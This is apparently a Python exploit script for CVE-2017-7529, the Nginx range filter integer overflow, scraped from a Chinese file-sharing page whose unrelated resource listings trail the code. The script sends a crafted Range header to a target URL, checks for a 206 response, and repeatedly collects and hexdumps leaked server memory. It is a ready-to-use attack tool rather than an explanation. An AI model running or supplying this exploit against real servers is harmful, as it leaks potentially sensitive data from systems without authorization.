import urllib.parse, requests, argparse
global colorama, termcolor
try:
import colorama, termcolor
colorama.init(autoreset=True)
except Exception as e:
termcolor = colorama = None
colored = lambda text, color="", dark=False: termcolor.colored(text, color or "white", attrs=["dark"] if dark else []) if termcolor and colorama else text
class Exploit(requests.Session):
buffer = set()
def __init__(self, url):
length = int(requests.get(url).headers.get("Content-Length", 0)) + 623
super().__init__()
self.headers = {"Range": f"bytes=-{length},-9223372036854{776000 - length}"}
self.target = urllib.parse.urlsplit(url)
def check(self):
try:
response = self.get(self.target.geturl())
return response.status_code == 206 and "Content-Range" in response.text
except Exception as e:
return False
def hexdump(self, data):
for b in range(0, len(data), 16):
line = [char for char in data[b: b + 16]]
print(colored(" - {:04x}: {:48} {}".format(b, " ".join(f"{char:02x}" for char in line), "".join((chr(char) if 32 <= char <= 126 else ".") for char in line)), dark=True))
def execute(self):
vulnerable = self.check()
print(colored(f"[{'+' if vulnerable else '-'}] {exploit.target.netloc} is Vulnerable: {str(vulnerable).upper()}", "white" if vulnerable else "yellow"))
if vulnerable:
data = b""
while len(self.buffer) < 0x80:
try:
response = self.get(self.target.geturl())
for line in response.content.split(b"\r\n"):
if line not in self.buffer:
data += line
self.buffer.add(line)
except Exception as e:
print()
print(colored(f"[!] {type(e).__name__}:", "red"))
print(colored(f" - {e}", "red", True))
break
except KeyboardInterrupt:
print()
print(colored("[!] Keyboard Interrupted! (Ctrl+C Pressed)", "red"))
break
print(colored(f"[i] Receiving Data [{len(data)} bytes] ..."), end = "\r")
if data:
print()
self.hexdump(data)
if __name__ == "__main__":
parser = argparse.ArgumentParser(prog = "CVE-2017-7529",
description = "Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.",
epilog = "By: en0f")
parser.add_argument("url", type = str, help = "Target URL.")
parser.add_argument("-c", "--check", action = "store_true", help = "Only check if Target is vulnerable.")
args = parser.parse_args()
try:
exploit = Exploit(args.url)
if args.check:
vulnerable = exploit.check()
print(colored(f"[{'+' if vulnerable else '-'}] {exploit.target.netloc} is Vulnerable: {str(vulnerable).upper()}", "white" if vulnerable else "yellow"))
else:
try:
exploit.execute()
except Exception as e:
print(colored(f"[!] {type(e).__name__}:", "red"))
print(colored(f" - {e}", "red", True))
except KeyboardInterrupt:
print(colored("[!] Keyboard Interrupted! (Ctrl+C Pressed)", "red"))
except Exception as e:
print(colored(f"[!] {urllib.parse.urlsplit(args.url).netloc}: {type(e).__name__}", "red"))
weixin_46651435
- 粉丝: 0
- 资源: 13
最新资源
- 姿态估计-基于Onnxruntime+OpenCV实现的实时人体头部姿态估计算法-项目源码-优质项目实战.zip
- 状态估计-融合GPS+IMU+编码器传感器实现的准确的状态估计-附项目源码-优质项目实战.zip
- 全新整理1999至2023年A股上市公司年报文本数据(pdf和txt格式).zip
- 用scratch做核桃编程
- scratch做植物大战僵尸无名版
- 50f72ac886a05a1918a9b12ed43b3c28.apk
- Qt Creator简要介绍.pdf
- 基于Bootstrap技术的便利店运营平台的设计与实现(概要设计)
- mapbox-polyline
- 网络空间安全 第三章作业.docx
资源上传下载、课程学习等过程中有任何疑问或建议,欢迎提出宝贵意见哦~我们会及时处理!
点击此处反馈